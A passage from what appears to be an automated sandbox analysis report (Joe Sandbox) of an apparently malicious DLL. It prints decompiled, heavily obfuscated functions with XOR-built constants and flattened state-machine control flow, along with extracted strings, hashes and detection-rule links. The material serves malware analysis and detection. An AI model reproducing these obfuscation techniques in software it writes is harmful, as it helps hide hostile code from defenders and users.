				_v92 = _v92 ^ 0x7b991acf;
				_v36 = 0x41254;
				_v36 = _v36 ^ 0x82dbc96b;
				_v36 = _v36 ^ 0x82dd2337;
				_v28 = 0x754151;
				_v28 = _v28 + 0x3d65;
				_v28 = _v28 ^ 0x0076627a;
				_v76 = 0xa9aca8;
				_v76 = _v76 * 0x46;
				_v76 = _v76 << 0x10;
				_v76 = _v76 * 0x71;
				_v76 = _v76 ^ 0xcef7d733;
				_v80 = 0x19ef1d;
				_v80 = _v80 + 0x4807;
				_v80 = _v80 >> 0x10;
				_t247 = 9;
				_v80 = _v80 / _t246;
				_v80 = _v80 ^ 0x000e4732;
				_v32 = 0xb4891b;
				_v32 = _v32 | 0x91ee1565;
				_v32 = _v32 ^ 0x91f206c4;
				_v52 = 0xb65ed8;
				_v52 = _v52 ^ 0x53a92618;
				_v52 = _v52 * 0x77;
				_v52 = _v52 ^ 0xa3a75cc7;
				_v20 = 0xeecfa7;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x3bb2e2c4;
				_v72 = 0xfbd7a5;
				_v72 = _v72 ^ 0x9f68e208;
				_v72 = _v72 << 8;
				_v72 = _v72 | 0x30258995;
				_v72 = _v72 ^ 0xb3385db1;
				_v24 = 0x1aaffc;
				_v24 = _v24 * 0x36;
				_v24 = _v24 ^ 0x05ac1646;
				_v16 = 0xb69c42;
				_v16 = _v16 + 0x3887;
				_v16 = _v16 ^ 0x00b1c7d8;
				_v44 = 0x5789e3;
				_v44 = _v44 / _t247;
				_v44 = _v44 + 0xffffe7e6;
				_v44 = _v44 ^ 0x00087fde;
				_v68 = 0x94873;
				_v68 = _v68 << 0xf;
				_v68 = _v68 + 0xffff48e1;
				_v68 = _v68 ^ 0x69c9ade9;
				_v68 = _v68 ^ 0xcdf62ffc;
				_v48 = 0x208212;
				_v48 = _v48 | 0x39c03c72;
				_v48 = _v48 >> 0xc;
				_v48 = _v48 ^ 0x0008cd3c;
				_v96 = 0x3b2be3;
				_v96 = _v96 ^ 0x07755c49;
				_v96 = _v96 >> 0xf;
				_v96 = _v96 ^ 0x076fdb2f;
				_v96 = _v96 ^ 0x07616547;
				_v100 = 0xac4dde;
				_v100 = _v100 + 0x3900;
				_t248 = 0x42;
				_v100 = _v100 * 0x54;
				_v100 = _v100 ^ 0x672a87d3;
				_v100 = _v100 ^ 0x5fb939da;
				_v104 = 0x9fab94;
				_v104 = _v104 ^ 0x81ae57b6;
				_v104 = _v104 | 0x48b65982;
				_v104 = _v104 * 0x3c;
				_v104 = _v104 ^ 0x471b6d30;
				_v56 = 0x9acae2;
				_v56 = _v56 << 3;
				_v56 = _v56 >> 0xf;
				_v56 = _v56 ^ 0x000181ed;
				_v60 = 0x9f5509;
				_v60 = _v60 / _t248;
				_v60 = _v60 >> 3;
				_v60 = _v60 + 0xfffff221;
				_v60 = _v60 ^ 0x000ffb1e;
				_v40 = 0x6ff3a2;
				_v40 = _v40 << 9;
				_v40 = _v40 + 0x9f22;
				_v40 = _v40 ^ 0xdfef744e;
				_v64 = 0xeafe6e;
				_v64 = _v64 ^ 0x9deccfb6;
				_v64 = _v64 << 0xf;
				_v64 = _v64 * 0x79;
				_v64 = _v64 ^ 0xc780890d;
				while(1) {
					L1:
					_t237 = 0xd8fe181;
					do {
						L2:
						while(_t268 != 0x72ed85) {
							if(_t268 == 0xb6c7232) {
								_t263 = _v44;
								_t248 = _v16;
								_t238 = E02B51005(_v16, _v44, _v68, _v48,  *((intOrPtr*)(_t267 + 0x38)));
								_t271 =  &(_t271[3]);
								 *((intOrPtr*)(_t267 + 0x2c)) = _t238;
								__eflags = _t238;
								_t237 = 0xd8fe181;
								_t268 =  !=  ? 0xd8fe181 : 0xd6f812a;
								continue;
							}
							if(_t268 == 0xc5020c9) {
								_push(_v36);
								_t239 = E02B53263(_v84, _v88, __eflags, _t243, _v92, _t248);
								_t272 =  &(_t271[4]);
								 *((intOrPtr*)(_t267 + 0x38)) = _t239;
								__eflags = _t239;
								if(_t239 != 0) {
									E02B5148A(_t239, _t239, _v28, _v76, _v80, _v32);
									_t263 = _v20;
									_t248 = _v52;
									E02B3E2BD(_v20, _v72,  *((intOrPtr*)(_t267 + 0x38)), _v24);
									_t271 =  &(_t272[7]);
									_t268 = 0xb6c7232;
									goto L1;
								}
							} else {
								if(_t268 == 0xd6f812a) {
									return E02B3F0E9(_v60,  *((intOrPtr*)(_t267 + 0x38)), _v40, _v64);
								}
								if(_t268 != _t237) {
									goto L13;
								} else {
									_t239 = E02B40EBC(_v96, _t263, _v100, _v96, _v104, _v56, _v96, _t248, _t267, E02B4A2A5);
									_t271 =  &(_t271[8]);
									 *((intOrPtr*)(_t267 + 0x48)) = _t239;
									if(_t239 == 0) {
										_t268 = 0xd6f812a;
										while(1) {
											L1:
											_t237 = 0xd8fe181;
											goto L2;
										}
									}
								}
							}
							return _t239;
						}
						_t268 = 0xc5020c9;
						L13:
						__eflags = _t268 - 0x11d9bb5;
					} while (__eflags != 0);
					return _t237;
				}
			}

0x02b52d53
0x02b52d56
0x02b52d5b
0x02b52d63
0x02b52d6b
0x02b52d73
0x02b52d7b
0x02b52d80
0x02b52d88
0x02b52d90
0x02b52d98
0x02b52da0
0x02b52da5
0x02b52dad
0x02b52db5
0x02b52dc7
0x02b52dc9
0x02b52dcb
0x02b52dce
0x02b52dd7
0x02b52de2
0x02b52de5
0x02b52de9
0x02b52df1
0x02b52df9
0x02b52e01
0x02b52e09
0x02b52e11
0x02b52e19
0x02b52e21
0x02b52e2e
0x02b52e32
0x02b52e3c
0x02b52e40
0x02b52e48
0x02b52e50
0x02b52e58
0x02b52e63
0x02b52e64
0x02b52e68
0x02b52e70
0x02b52e78
0x02b52e80
0x02b52e88
0x02b52e90
0x02b52e9d
0x02b52ea1
0x02b52ea9
0x02b52eb1
0x02b52eb6
0x02b52ebe
0x02b52ec6
0x02b52ece
0x02b52ed3
0x02b52edb
0x02b52ee3
0x02b52ef0
0x02b52ef4
0x02b52efc
0x02b52f04
0x02b52f0c
0x02b52f16
0x02b52f26
0x02b52f2c
0x02b52f39
0x02b52f41
0x02b52f49
0x02b52f4e
0x02b52f56
0x02b52f5e
0x02b52f66
0x02b52f6e
0x02b52f76
0x02b52f7b
0x02b52f83
0x02b52f8b
0x02b52f93
0x02b52f98
0x02b52fa0
0x02b52fa8
0x02b52fb0
0x02b52fbd
0x02b52fbe
0x02b52fc2
0x02b52fca
0x02b52fd2
0x02b52fda
0x02b52fe2
0x02b52fef
0x02b52ff3
0x02b52ffb
0x02b53003
0x02b53008
0x02b5300d
0x02b53015
0x02b53023
0x02b53027
0x02b5302c
0x02b53034
0x02b5303c
0x02b53044
0x02b53049
0x02b53051
0x02b53059
0x02b53061
0x02b53069
0x02b53073
0x02b53077
0x02b5307f
0x02b5307f
0x02b5307f
0x02b53084
0x00000000
0x02b53084
0x02b53096
0x02b53155
0x02b53159
0x02b5315d
0x02b53162
0x02b53165
0x02b53168
0x02b5316c
0x02b53171
0x00000000
0x02b53171
0x02b530a2
0x02b530e4
0x02b530f6
0x02b530fb
0x02b530fe
0x02b53101
0x02b53103
0x02b5311d
0x02b5312d
0x02b53134
0x02b53138
0x02b5313d
0x02b53140
0x00000000
0x02b53140
0x02b530a4
0x02b530a6
0x00000000
0x02b531a1
0x02b530ae
0x00000000
0x02b530b4
0x02b530cd
0x02b530d2
0x02b530d5
0x02b530da
0x02b530e0
0x02b5307f
0x02b5307f
0x02b5307f
0x00000000
0x02b5307f
0x02b5307f
0x02b530da
0x02b530ae
0x02b531a9
0x02b531a9
0x02b53179
0x02b5317e
0x02b5317e
0x02b5317e
0x00000000
0x02b53084

Strings

+;, xrefs: 02B52F83
$P, xrefs: 02B52DC3, 02B530B9
zbv, xrefs: 02B52E19
sH, xrefs: 02B52F41

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: $P$sH$zbv$+;
API String ID: 0-3806253346
Opcode ID: a52a7b869f813ce48b5797bd07b4ef628a4960694cf2336b9c4122fe457619f6
Instruction ID: 37599ec59c912eb0aabdb104111a2c0431d46414fc048954213a6f648fa76757
Opcode Fuzzy Hash: a52a7b869f813ce48b5797bd07b4ef628a4960694cf2336b9c4122fe457619f6
Instruction Fuzzy Hash: 79B10E72408381AFD399CF65C48A51BFBE2FBC4358F509A1DF5968A260D3B1C949CF82

Uniqueness

Uniqueness Score: -1.00%

Function 02B4E4E5, Relevance: 5.2, Strings: 4, Instructions: 220
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E02B4E4E5(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v60;
				intOrPtr _v80;
				intOrPtr _v92;
				intOrPtr _v124;
				intOrPtr _v140;
				char _v152;
				char _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				unsigned int _v200;
				void* __ecx;
				void* _t118;
				signed int _t141;
				void* _t151;
				intOrPtr _t166;
				intOrPtr _t182;
				signed int _t183;
				intOrPtr _t184;
				signed int* _t187;
				void* _t189;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E02B4FE29(_t118);
				_v196 = 0x42a34f;
				_t187 =  &(( &_v200)[5]);
				_v196 = _v196 + 0xffffd591;
				_v196 = _v196 >> 8;
				_t182 = 0;
				_v196 = _v196 >> 0xd;
				_t151 = 0x8265549;
				_v196 = _v196 ^ 0x000e54fd;
				_v192 = 0xf4ad66;
				_t183 = 0x28;
				_v192 = _v192 * 0x74;
				_v192 = _v192 + 0xffff9a5e;
				_v192 = _v192 * 0x25;
				_v192 = _v192 ^ 0x06100388;
				_v164 = 0xada112;
				_v164 = _v164 << 6;
				_v164 = _v164 ^ 0x2b616de0;
				_v188 = 0x6e3b94;
				_v188 = _v188 * 0x6f;
				_v188 = _v188 ^ 0xb2fa2ce6;
				_v188 = _v188 >> 2;
				_v188 = _v188 ^ 0x27407061;
				_v184 = 0x76ba26;
				_v184 = _v184 ^ 0xa3b8c1ec;
				_v184 = _v184 * 6;
				_v184 = _v184 ^ 0xd6d91427;
				_v172 = 0x136254;
				_v172 = _v172 + 0x2ded;
				_v172 = _v172 ^ 0x001b6319;
				_v200 = 0xa09af9;
				_v200 = _v200 + 0x31d;
				_v200 = _v200 + 0xffff390b;
				_v200 = _v200 >> 0xc;
				_v200 = _v200 ^ 0x000c9fcd;
				_v176 = 0xee2a82;
				_v176 = _v176 / _t183;
				_v176 = _v176 ^ 0x000a5024;
				_t66 =  &_v176; // 0xa5024
				_t184 =  *_t66;
				_v180 = 0xbc2dba;
				_v180 = _v180 << 0xa;
				_v180 = _v180 << 0xc;
				_v180 = _v180 ^ 0x6e88cd95;
				_v168 = 0x8f86b;
				_v168 = _v168 * 0x73;
				_v168 = _v168 ^ 0x040961a3;
				while(1) {
					_t189 = _t151 - 0x90fe06e;
					if(_t189 > 0) {
						goto L23;
					}
					L2:
					if(_t189 == 0) {
						__eflags = _v140 - 3;
						if(__eflags == 0) {
							E02B500EF( &_v152);
							L16:
							_t151 = 0x574a4dd;
							continue;
							do {
								while(1) {
									_t189 = _t151 - 0x90fe06e;
									if(_t189 > 0) {
										goto L23;
									}
									goto L2;
								}
								L45:
								__eflags = _t151 - 0x4105f99;
							} while (__eflags != 0);
							L46:
							return _t182;
						}
						_t151 = 0xaf84b7f;
						while(1) {
							_t189 = _t151 - 0x90fe06e;
							if(_t189 > 0) {
								goto L23;
							}
							goto L2;
						}
						goto L23;
					}
					if(_t151 == 0x172cdb8) {
						_push(_t151);
						_push(_t151);
						_t184 = E02B3C5D8(0x5c);
						_t187 =  &(_t187[3]);
						__eflags = _t184;
						if(__eflags == 0) {
							L14:
							_t151 = 0x666f2cd;
							continue;
						}
						 *((intOrPtr*)(_t184 + 0x30)) = _v80;
						 *((intOrPtr*)(_t184 + 8)) = _v124;
						 *((intOrPtr*)(_t184 + 4)) = _v92;
						_t151 = 0xc6d3ff5;
						continue;
					}
					if(_t151 == 0x2270dbc) {
						__eflags = _v140 - 7;
						if(__eflags == 0) {
							E02B47D5B( &_v152);
						}
						goto L16;
					}
					if(_t151 == 0x39f0156) {
						__eflags = E02B49D3E( &_v60, _v164, __eflags, _v188,  &_v160);
						if(__eflags == 0) {
							goto L46;
						}
						goto L14;
					}
					if(_t151 == 0x574a4dd) {
						_t166 =  *0x2b56210; // 0x0
						_t182 = _t182 + 1;
						__eflags = _t182;
						 *((intOrPtr*)(_t184 + 0x24)) =  *((intOrPtr*)(_t166 + 0x210));
						 *((intOrPtr*)(_t166 + 0x210)) = _t184;
						L12:
						_t151 = 0x39f0156;
						continue;
					}
					if(_t151 == 0x666f2cd) {
						_t141 = E02B48806(_v184, _v172,  &_v160,  &_v152);
						asm("sbb ecx, ecx");
						_t151 = ( ~_t141 & 0xfdd3cc62) + 0x39f0156;
						continue;
					}
					if(_t151 != 0x8265549) {
						goto L45;
					}
					E02B322A6(_a4, _v196,  &_v60, _v192);
					_t187 =  &(_t187[2]);
					_t151 = 0xf4b2976;
					continue;
					L23:
					__eflags = _t151 - 0x9a4295f;
					if(_t151 == 0x9a4295f) {
						__eflags = _v140 - 5;
						if(__eflags == 0) {
							E02B52D53( &_v152, _t184);
							_t151 = 0x574a4dd;
							goto L45;
						}
						_t151 = 0xa7bb9ce;
						continue;
					}
					__eflags = _t151 - 0xa7bb9ce;
					if(_t151 == 0xa7bb9ce) {
						__eflags = _v140 - 6;
						if(__eflags == 0) {
							E02B4A474( &_v152);
							goto L16;
						}
						_t151 = 0x2270dbc;
						continue;
					}
					__eflags = _t151 - 0xaf84b7f;
					if(_t151 == 0xaf84b7f) {
						__eflags = _v140 - 4;
						if(__eflags == 0) {
							E02B3238C( &_v152);
							goto L16;
						}
						_t151 = 0x9a4295f;
						continue;
					}
					__eflags = _t151 - 0xbf40480;
					if(_t151 == 0xbf40480) {
						__eflags = _v140 - 2;
						if(__eflags == 0) {
							E02B4CCD9( &_v152, _t184);
							goto L16;
						}
						_t151 = 0x90fe06e;
						continue;
					}
					__eflags = _t151 - 0xc6d3ff5;
					if(_t151 == 0xc6d3ff5) {
						__eflags = _v140 - 1;
						if(__eflags == 0) {
							E02B3A871( &_v152);
							goto L16;
						}
						_t151 = 0xbf40480;
						continue;
					}
					__eflags = _t151 - 0xf4b2976;
					if(_t151 != 0xf4b2976) {
						goto L45;
					}
					E02B3B820(0);
					goto L12;
				}
			}

0x02b4e4ef
0x02b4e4f6
0x02b4e4fd
0x02b4e504
0x02b4e506
0x02b4e50b
0x02b4e513
0x02b4e516
0x02b4e520
0x02b4e525
0x02b4e527
0x02b4e52c
0x02b4e531
0x02b4e53e
0x02b4e552
0x02b4e553
0x02b4e557
0x02b4e564
0x02b4e568
0x02b4e570
0x02b4e578
0x02b4e57d
0x02b4e585
0x02b4e592
0x02b4e596
0x02b4e59e
0x02b4e5a3
0x02b4e5ab
0x02b4e5b3
0x02b4e5c0
0x02b4e5c4
0x02b4e5cc
0x02b4e5d4
0x02b4e5dc
0x02b4e5e4
0x02b4e5ec
0x02b4e5f4
0x02b4e5fc
0x02b4e601
0x02b4e609
0x02b4e617
0x02b4e61b
0x02b4e623
0x02b4e623
0x02b4e627
0x02b4e62f
0x02b4e634
0x02b4e639
0x02b4e641
0x02b4e64e
0x02b4e652
0x02b4e65a
0x02b4e65a
0x02b4e660
0x00000000
0x00000000
0x02b4e666
0x02b4e666
0x02b4e79d
0x02b4e7a2
0x02b4e7b2
0x02b4e747
0x02b4e747
0x02b4e749
0x02b4e65a
0x02b4e65a
0x02b4e65a
0x02b4e660
0x00000000
0x00000000
0x00000000
0x02b4e660
0x02b4e89d
0x02b4e89d
0x02b4e89d
0x02b4e8a9
0x02b4e8b5
0x02b4e8b5
0x02b4e7a4
0x02b4e65a
0x02b4e65a
0x02b4e660
0x00000000
0x00000000
0x00000000
0x02b4e660
0x00000000
0x02b4e65a
0x02b4e672
0x02b4e769
0x02b4e76a
0x02b4e772
0x02b4e774
0x02b4e777
0x02b4e779
0x02b4e736
0x02b4e736
0x00000000
0x02b4e736
0x02b4e782
0x02b4e789
0x02b4e790
0x02b4e793
0x00000000
0x02b4e793
0x02b4e67e
0x02b4e740
0x02b4e745
0x02b4e752
0x02b4e752
0x00000000
0x02b4e745
0x02b4e686
0x02b4e72e
0x02b4e730
0x00000000
0x00000000
0x00000000
0x02b4e730
0x02b4e68e
0x02b4e6f6
0x02b4e6fc
0x02b4e6fc
0x02b4e703
0x02b4e706
0x02b4e70c
0x02b4e70c
0x00000000
0x02b4e70c
0x02b4e696
0x02b4e6dc
0x02b4e6e7
0x02b4e6ef
0x00000000
0x02b4e6ef
0x02b4e69e
0x00000000
0x00000000
0x02b4e6bb
0x02b4e6c0
0x02b4e6c3
0x00000000
0x02b4e7b9
0x02b4e7b9
0x02b4e7bf
0x02b4e87f
0x02b4e884
0x02b4e896
0x02b4e89b
0x00000000
0x02b4e89b
0x02b4e886
0x00000000
0x02b4e886
0x02b4e7c5
0x02b4e7cb
0x02b4e860
0x02b4e865
0x02b4e875
0x00000000
0x02b4e875
0x02b4e867
0x00000000
0x02b4e867
0x02b4e7d1
0x02b4e7d7
0x02b4e841
0x02b4e846
0x02b4e856
0x00000000
0x02b4e856
0x02b4e848
0x00000000
0x02b4e848
0x02b4e7d9
0x02b4e7df
0x02b4e820
0x02b4e825
0x02b4e837
0x00000000
0x02b4e837
0x02b4e827
0x00000000
0x02b4e827
0x02b4e7e1
0x02b4e7e7
0x02b4e801
0x02b4e806
0x02b4e816
0x00000000
0x02b4e816
0x02b4e808
0x00000000
0x02b4e808
0x02b4e7e9
0x02b4e7ef
0x00000000
0x00000000
0x02b4e7f7
0x00000000
0x02b4e7f7

Strings

-, xrefs: 02B4E5D4
ap@', xrefs: 02B4E5A3
$P, xrefs: 02B4E623
ma+, xrefs: 02B4E57D

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: $P$ap@'$-$ma+
API String ID: 0-1845766705
Opcode ID: a795d936db93f6486332e9bb4dcb186fec97e6d507364036029d4d70d06131f0
Instruction ID: 78e0e0498a42f03c086aee2e47269675bcc00e836ddc88873be11ba299d29317
Opcode Fuzzy Hash: a795d936db93f6486332e9bb4dcb186fec97e6d507364036029d4d70d06131f0
Instruction Fuzzy Hash: 86916B716083418BC768CF24D89892FBBE5FBC4318F044AAEE69656261DB70DA49DF43

Uniqueness

Uniqueness Score: -1.00%

Function 02B43EAA, Relevance: 5.2, Strings: 4, Instructions: 152
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E02B43EAA() {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _t134;
				void* _t136;
				signed int _t139;
				signed int _t140;
				void* _t141;
				signed int _t158;
				signed int _t159;
				signed int _t160;
				void* _t162;
				signed int _t163;
				signed int* _t164;

				_t164 =  &_v572;
				_v540 = 0x8ebbe1;
				_v540 = _v540 ^ 0xad58d7a7;
				_t141 = 0x14ab4b7;
				_v540 = _v540 + 0xffffedc9;
				_v540 = _v540 ^ 0xadd357de;
				_v568 = 0x9c9bda;
				_v568 = _v568 | 0x36ff3ceb;
				_v568 = _v568 << 9;
				_v568 = _v568 << 0xc;
				_v568 = _v568 ^ 0xff6ebe8a;
				_v572 = 0xc63a18;
				_t158 = 0x35;
				_v572 = _v572 / _t158;
				_v572 = _v572 + 0x3c6e;
				_t162 = 0;
				_t159 = 9;
				_v572 = _v572 * 0x2b;
				_v572 = _v572 ^ 0x00acfd7d;
				_v564 = 0xeb3370;
				_v564 = _v564 + 0xdf6d;
				_v564 = _v564 + 0xffff5689;
				_v564 = _v564 + 0xffff8af1;
				_v564 = _v564 ^ 0x00e2fb3e;
				_v556 = 0xcf22db;
				_v556 = _v556 + 0xdc1c;
				_v556 = _v556 ^ 0xabcda180;
				_v556 = _v556 * 0x79;
				_v556 = _v556 ^ 0xd41378ff;
				_v536 = 0x8b65e6;
				_v536 = _v536 >> 4;
				_v536 = _v536 | 0x892333f7;
				_v536 = _v536 ^ 0x8920b82e;
				_v552 = 0x92756e;
				_v552 = _v552 >> 9;
				_v552 = _v552 ^ 0x00055fbe;
				_v548 = 0xae9165;
				_v548 = _v548 >> 8;
				_v548 = _v548 << 3;
				_v548 = _v548 ^ 0x000d4470;
				_v560 = 0x7e7234;
				_t163 = _v552;
				_t140 = _v552;
				_v560 = _v560 * 0x4b;
				_v560 = _v560 * 0x7e;
				_v560 = _v560 / _t159;
				_v560 = _v560 ^ 0x06ab9265;
				_v524 = 0x1cfeb9;
				_v524 = _v524 + 0xfb24;
				_v524 = _v524 ^ 0x001447a0;
				_v532 = 0x9f8444;
				_t160 = 0x41;
				_t161 = _v552;
				_v532 = _v532 / _t160;
				_v532 = _v532 ^ 0x00060648;
				_v528 = 0xb53968;
				_v528 = _v528 >> 6;
				_v528 = _v528 ^ 0x00025f1c;
				while(_t141 != 0x6ff509) {
					if(_t141 == 0x14ab4b7) {
						_t141 = 0x9db1fde;
						continue;
					} else {
						if(_t141 == 0x18d2c7e) {
							_t140 = E02B409DD(_v536,  &_v520, _v552, _v548);
							_t141 = 0x3c9aed4;
							continue;
						} else {
							if(_t141 == 0x3c9aed4) {
								_t134 = E02B3EFE1(_v524, _v532, _v528, _t140);
								_t164 =  &(_t164[3]);
								_t163 = _t134;
								_t141 = 0x6ff509;
								continue;
							} else {
								if(_t141 == 0x65dbbcc) {
									_push(_t141);
									_t136 = E02B40ABA(_v568, _v572, __eflags, _v564,  &_v520, _t161, _v556);
									_t164 =  &(_t164[5]);
									__eflags = _t136;
									if(__eflags != 0) {
										_t141 = 0x18d2c7e;
										continue;
									}
								} else {
									if(_t141 != 0x9db1fde) {
										L15:
										__eflags = _t141 - 0xdb9fdb2;
										if(__eflags != 0) {
											continue;
										}
									} else {
										_t139 = E02B3DD35();
										_t161 = _t139;
										if(_t139 != 0) {
											_t141 = 0x65dbbcc;
											continue;
										}
									}
								}
							}
						}
					}
					return _t162;
				}
				_v544 = 0xee725a;
				_v544 = _v544 ^ 0x4fb40d60;
				_v544 = _v544 | 0x3a9e06c5;
				_v544 = _v544 ^ 0x55f97f1d;
				__eflags = _t163 - _v544;
				_t162 =  ==  ? 1 : _t162;
				_t141 = 0xdb9fdb2;
				goto L15;
			}

0x02b43eaa
0x02b43eb0
0x02b43eba
0x02b43ec2
0x02b43ec7
0x02b43ecf
0x02b43ed7
0x02b43edf
0x02b43ee7
0x02b43eec
0x02b43ef1
0x02b43ef9
0x02b43f09
0x02b43f0e
0x02b43f14
0x02b43f1c
0x02b43f23
0x02b43f26
0x02b43f2a
0x02b43f32
0x02b43f3a
0x02b43f42
0x02b43f4a
0x02b43f52
0x02b43f5a
0x02b43f62
0x02b43f6a
0x02b43f77
0x02b43f7b
0x02b43f83
0x02b43f8b
0x02b43f90
0x02b43f98
0x02b43fa0
0x02b43fa8
0x02b43fad
0x02b43fb5
0x02b43fbd
0x02b43fc2
0x02b43fc7
0x02b43fcf
0x02b43fdc
0x02b43fe0
0x02b43fe4
0x02b43fed
0x02b43ff9
0x02b43ffd
0x02b44005
0x02b4400d
0x02b44015
0x02b4401d
0x02b44029
0x02b4402c
0x02b44030
0x02b44034
0x02b4403c
0x02b44044
0x02b44049
0x02b44051
0x02b44063
0x02b44124
0x00000000
0x02b44069
0x02b4406f
0x02b44118
0x02b4411a
0x00000000
0x02b44075
0x02b4407b
0x02b440ed
0x02b440f2
0x02b440f5
0x02b440f7
0x00000000
0x02b4407d
0x02b44083
0x02b440ab
0x02b440c2
0x02b440c7
0x02b440ca
0x02b440cc
0x02b440d2
0x00000000
0x02b440d2
0x02b44085
0x02b4408b
0x02b4415f
0x02b4415f
0x02b44165
0x00000000
0x00000000
0x02b44091
0x02b44095
0x02b4409a
0x02b4409e
0x02b440a4
0x00000000
0x02b440a4
0x02b4409e
0x02b4408b
0x02b44083
0x02b4407b
0x02b4406f
0x02b44177
0x02b44177
0x02b4412e
0x02b44138
0x02b44141
0x02b44149
0x02b44155
0x02b44157
0x02b4415a
0x00000000

Strings

n<, xrefs: 02B43F14
p3, xrefs: 02B43F32
Zr, xrefs: 02B4412E
4r~, xrefs: 02B43FCF

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: 4r~$Zr$n<$p3
API String ID: 0-1989199487
Opcode ID: 9c14014ca497ea253b6b14b19677e07633968f0fa0b54784dcf0298cd53d7ee1
Instruction ID: f26053846a3f6b4bc45edc36746428f70e9a1cd43190db8e8f52f168d29082c1
Opcode Fuzzy Hash: 9c14014ca497ea253b6b14b19677e07633968f0fa0b54784dcf0298cd53d7ee1
Instruction Fuzzy Hash: 176154715083009FC358CE26C48952BBBF2FBD8758F104A6DF29AA6220D7B4CA59CF46

Uniqueness

Uniqueness Score: -1.00%

Function 02B485FF, Relevance: 5.1, Strings: 4, Instructions: 142
COMMONCrypto

Download Yara Rule

C-Code - Quality: 65%

			E02B485FF(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v76;
				char _v80;
				char _v148;
				void* _t125;
				signed int _t148;
				signed int _t149;
				intOrPtr _t165;
				char _t166;

				_t165 = _a4;
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_t165);
				_push(__edx);
				_push(__ecx);
				E02B4FE29(_t125);
				_v56 = _v56 & 0x00000000;
				_v64 = 0x4c8eee;
				_v60 = 0xd08445;
				_v12 = 0x2b5b52;
				_v12 = _v12 << 0xa;
				_v12 = _v12 ^ 0x243df932;
				_t148 = 0x1b;
				_v12 = _v12 / _t148;
				_v12 = _v12 ^ 0x0511db29;
				_v32 = 0x4cbd6f;
				_v32 = _v32 >> 0xd;
				_v32 = _v32 << 0x10;
				_v32 = _v32 ^ 0x02619ccd;
				_v8 = 0x229cdc;
				_v8 = _v8 ^ 0x1dfe7fc6;
				_v8 = _v8 + 0x780d;
				_v8 = _v8 >> 1;
				_v8 = _v8 ^ 0x0ee175b3;
				_v40 = 0x8e82d1;
				_v40 = _v40 + 0xffffcc21;
				_t149 = 0x39;
				_v40 = _v40 * 0x69;
				_v40 = _v40 ^ 0x3a51eacf;
				_v20 = 0xb8087c;
				_v20 = _v20 * 0x23;
				_v20 = _v20 >> 5;
				_v20 = _v20 ^ 0x00c96169;
				_v24 = 0x5c9964;
				_v24 = _v24 / _t149;
				_v24 = _v24 >> 7;
				_v24 = _v24 ^ 0x00085b7f;
				_v36 = 0xf34403;
				_v36 = _v36 * 0x6a;
				_v36 = _v36 | 0x7504e0f6;
				_v36 = _v36 ^ 0x75b6ad40;
				_v28 = 0x74a083;
				_v28 = _v28 * 0x7e;
				_v28 = _v28 >> 6;
				_v28 = _v28 ^ 0x00e859e6;
				_v48 = 0x5be020;
				_v48 = _v48 << 3;
				_v48 = _v48 ^ 0x02dd1a4a;
				_v44 = 0xfc2deb;
				_v44 = _v44 + 0x1b3b;
				_v44 = _v44 ^ 0x00f2ef0d;
				_v52 = 0x7de099;
				_v52 = _v52 ^ 0xb346769d;
				_v52 = _v52 ^ 0xb330844a;
				_v16 = 0x4076ee;
				_v16 = _v16 * 0xa;
				_v16 = _v16 * 0x14;
				_v16 = _v16 << 7;
				_v16 = _v16 ^ 0x2e751909;
				_t150 = _v12;
				_push( &_v148);
				_t166 = 0x44;
				_push(_t166);
				E02B4FE2A(_v12, _v32);
				_v148 = _t166;
				if(E02B52C24(_a8, _v8, _v12, _t150, _v40, _t150, _v20, _a20, _v24,  &_v148, _t150, _v36, _v28, _t150, _a12,  &_v80) == 0) {
					return 0;
				}
				if(_t165 == 0) {
					E02B51538(_v48, _v44, _v80);
					E02B51538(_v52, _v16, _v76);
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				return 1;
			}

0x02b4860a
0x02b4860d
0x02b4860f
0x02b48612
0x02b48615
0x02b48618
0x02b4861b
0x02b4861e
0x02b4861f
0x02b48620
0x02b48621
0x02b48626
0x02b4862c
0x02b48633
0x02b4863a
0x02b48641
0x02b48645
